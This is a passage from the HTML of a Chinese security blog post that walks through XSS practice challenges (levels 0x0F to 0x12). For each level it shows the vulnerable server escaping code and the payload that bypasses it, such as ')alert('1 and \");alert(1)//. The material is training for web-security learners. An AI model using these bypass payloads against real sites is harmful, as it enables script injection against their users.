            .replace(<span class="hljs-regexp">/&quot;/g</span>, <span class="hljs-string">&#x27;&amp;quot;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&lt;/g</span>, <span class="hljs-string">&#x27;&amp;lt;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&gt;/g</span>, <span class="hljs-string">&#x27;&amp;gt;&#x27;</span>)
            .replace(<span class="hljs-regexp">/\//g</span>, <span class="hljs-string">&#x27;&amp;#x2f;&#x27;</span>)
  &#125;
  <span class="hljs-keyword">return</span> <span class="hljs-string">`&lt;img src onerror=&quot;console.error(&#x27;<span class="hljs-subst">$&#123;escapeHtml(input)&#125;</span>&#x27;)&quot;&gt;`</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">img</span> <span class="hljs-attr">src</span> <span class="hljs-attr">onerror</span>=<span class="hljs-string">&quot;console.error(&#x27;&#x27;)&quot;</span>&gt;</span></span></code></pre></div>

<p>服务器对<code>&amp; &#39; &quot; &lt; &gt; \</code>进行HTML实体编码,但是在HTML标签里面使用HTML实体编码没啥用,因为浏览器会解析HTML实体编码,所以将<code>onerror的console.error闭合</code>绕过就行了</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
<span class="hljs-string">&#x27;)alert(&#x27;</span><span class="hljs-number">1</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-16.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x10"><a href="#0x10" class="headerlink" title="0x10"></a>0x10</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">input</span>) </span>&#123;
  <span class="hljs-keyword">return</span> <span class="hljs-string">`</span>
<span class="hljs-string">&lt;script&gt;</span>
<span class="hljs-string">  window.data = <span class="hljs-subst">$&#123;input&#125;</span></span>
<span class="hljs-string">&lt;/script&gt;</span>
<span class="hljs-string">  `</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"></span></span>
<span class="javascript"><span class="xml">  <span class="hljs-built_in">window</span>.data =</span></span>
<span class="javascript"><span class="xml"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p>送分题???没有任何过滤,能直接执行alert(1)</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
alert(<span class="hljs-number">1</span>)</code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-17.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x11"><a href="#0x11" class="headerlink" title="0x11"></a>0x11</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-comment">// from alf.nu</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">render</span> (<span class="hljs-params">s</span>) </span>&#123;
  <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escapeJs</span> (<span class="hljs-params">s</span>) </span>&#123;
    <span class="hljs-keyword">return</span> <span class="hljs-built_in">String</span>(s)
            .replace(<span class="hljs-regexp">/\\/g</span>, <span class="hljs-string">&#x27;\\\\&#x27;</span>)
            .replace(<span class="hljs-regexp">/&#x27;/g</span>, <span class="hljs-string">&#x27;\\\&#x27;&#x27;</span>)
            .replace(<span class="hljs-regexp">/&quot;/g</span>, <span class="hljs-string">&#x27;\\&quot;&#x27;</span>)
            .replace(<span class="hljs-regexp">/`/g</span>, <span class="hljs-string">&#x27;\\`&#x27;</span>)
            .replace(<span class="hljs-regexp">/&lt;/g</span>, <span class="hljs-string">&#x27;\\74&#x27;</span>)
            .replace(<span class="hljs-regexp">/&gt;/g</span>, <span class="hljs-string">&#x27;\\76&#x27;</span>)
            .replace(<span class="hljs-regexp">/\//g</span>, <span class="hljs-string">&#x27;\\/&#x27;</span>)
            .replace(<span class="hljs-regexp">/\n/g</span>, <span class="hljs-string">&#x27;\\n&#x27;</span>)
            .replace(<span class="hljs-regexp">/\r/g</span>, <span class="hljs-string">&#x27;\\r&#x27;</span>)
            .replace(<span class="hljs-regexp">/\t/g</span>, <span class="hljs-string">&#x27;\\t&#x27;</span>)
            .replace(<span class="hljs-regexp">/\f/g</span>, <span class="hljs-string">&#x27;\\f&#x27;</span>)
            .replace(<span class="hljs-regexp">/\v/g</span>, <span class="hljs-string">&#x27;\\v&#x27;</span>)
            <span class="hljs-comment">// .replace(/\b/g, &#x27;\\b&#x27;)</span>
            .replace(<span class="hljs-regexp">/\0/g</span>, <span class="hljs-string">&#x27;\\0&#x27;</span>)
  &#125;
  s = escapeJs(s)
  <span class="hljs-keyword">return</span> <span class="hljs-string">`</span>
<span class="hljs-string">&lt;script&gt;</span>
<span class="hljs-string">  var url = &#x27;javascript:console.log(&quot;<span class="hljs-subst">$&#123;s&#125;</span>&quot;)&#x27;</span>
<span class="hljs-string">  var a = document.createElement(&#x27;a&#x27;)</span>
<span class="hljs-string">  a.href = url</span>
<span class="hljs-string">  document.body.appendChild(a)</span>
<span class="hljs-string">  a.click()</span>
<span class="hljs-string">&lt;/script&gt;</span>
<span class="hljs-string">`</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"></span></span>
<span class="javascript"><span class="xml">  <span class="hljs-keyword">var</span> url = <span class="hljs-string">&#x27;javascript:console.log(&quot;&quot;)&#x27;</span></span></span>
<span class="javascript"><span class="xml">  <span class="hljs-keyword">var</span> a = <span class="hljs-built_in">document</span>.createElement(<span class="hljs-string">&#x27;a&#x27;</span>)</span></span>
<span class="javascript"><span class="xml">  a.href = url</span></span>
<span class="javascript"><span class="xml">  <span class="hljs-built_in">document</span>.body.appendChild(a)</span></span>
<span class="javascript"><span class="xml">  a.click()</span></span>
<span class="javascript"><span class="xml"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p>服务器过滤了一大堆字符,并在其前面添加反斜杠进行转义</p>
<p>注意<code>console.log(&quot;$&#123;s&#125;&quot;)</code>,当我们输入一个双引号<code>&quot;</code>,正则会变成<code>\&quot;</code>,然后整条语句变成<code>console.log(&quot;\&quot;&quot;)</code>.这样反斜杠就失去转义的作用</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
<span class="hljs-string">&quot;);alert(&quot;</span><span class="hljs-number">1</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-18.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

<h2 id="0x12"><a href="#0x12" class="headerlink" title="0x12"></a>0x12</h2><div class="code-wrapper"><pre><code class="hljs javascript">服务器端代码:
<span class="hljs-comment">// from alf.nu</span>
<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">escape</span> (<span class="hljs-params">s</span>) </span>&#123;
  s = s.replace(<span class="hljs-regexp">/&quot;/g</span>, <span class="hljs-string">&#x27;\\&quot;&#x27;</span>)
  <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&lt;script&gt;console.log(&quot;&#x27;</span> + s + <span class="hljs-string">&#x27;&quot;);&lt;/script&gt;&#x27;</span>
&#125;

前端代码:
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="javascript"><span class="hljs-built_in">console</span>.log(<span class="hljs-string">&quot;&quot;</span>);</span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span></span></code></pre></div>

<p>服务器对双引号进行过滤,转为<code>\\&quot;</code>,把双引号和括号进行补全就能绕过</p>
<div class="code-wrapper"><pre><code class="hljs javascript">payload:
\<span class="hljs-string">&quot;);alert(1)//</span></code></pre></div>

<p><img src="https://raw.githubusercontent.com/MokYan/Figurebed/master/img/xss-19.png" srcset="/Study/img/loading.gif" lazyload></p>
<br>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/Study/categories/%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/">靶机练习</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/Study/tags/Web%E5%AE%89%E5%85%A8/">Web安全</a>
                    
                      <a class="hover-with-bg" href="/Study/tags/XSS/">XSS</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/Study/post/XSS-Exercise-2/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">XSS弹窗练习 ：http://test.xss.tv</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/Study/post/Study-Note-For-Docker/">
                        <span class="hidden-mobile">Docker保姆级教程：从入门到入土</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      var light = 'boxy-light';
      var dark = 'github-dark-orange';
      var schema = document.documentElement.getAttribute('data-user-color-scheme');
      if (schema === 'dark') {
        schema = dark;
      } else {
        schema = light;
      }
      window.UtterancesThemeLight = light;
      window.UtterancesThemeDark = dark;
      var s = document.createElement('script');
      s.setAttribute('src', 'https://utteranc.es/client.js');
      s.setAttribute('repo', 'MokYan/MokYan.github.io');
      s.setAttribute('issue-term', 'title');
      
      s.setAttribute('label', 'utterances');
      
      s.setAttribute('theme', schema);
      s.setAttribute('crossorigin', 'anonymous');
      document.getElementById('comments').appendChild(s);
    })
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/Study/js/events.js" ></script>
<script  src="/Study/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/Study/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/Study/js/local-search.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/Study/js/boot.js" ></script>


</body>
</html>
